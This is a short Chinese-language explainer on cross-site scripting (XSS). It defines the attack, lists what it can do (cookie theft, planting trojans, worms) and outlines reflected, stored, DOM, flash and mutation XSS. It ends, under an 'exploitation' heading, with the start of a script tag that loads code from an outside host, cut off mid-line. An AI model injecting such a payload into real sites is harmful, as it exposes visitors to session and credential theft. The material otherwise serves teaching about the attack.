xss是什么

跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。

xss可以做什么

• 盗取cookie
• 挂马
• XSS Worm
• 等

xss分类

• 反射性 xss
• 储存型 xss
  • 提交的xss代码会储存在服务器
  • 如留言板xss，xss代码储存到数据库，当有用户查看包含xss代码的浏览时代码就会被执行
  • 储存型xss最隐蔽
• DOM xss
  • 不需要服务器解析，依靠浏览器端DOM解析
• flash xss
  • 利用flash文件缺陷执行js脚本，一般为反射性xss
• mxss
  • 又叫突变xss，主要用于绕过xss过滤

xss利用

    <script src='http://b.ioio.pub …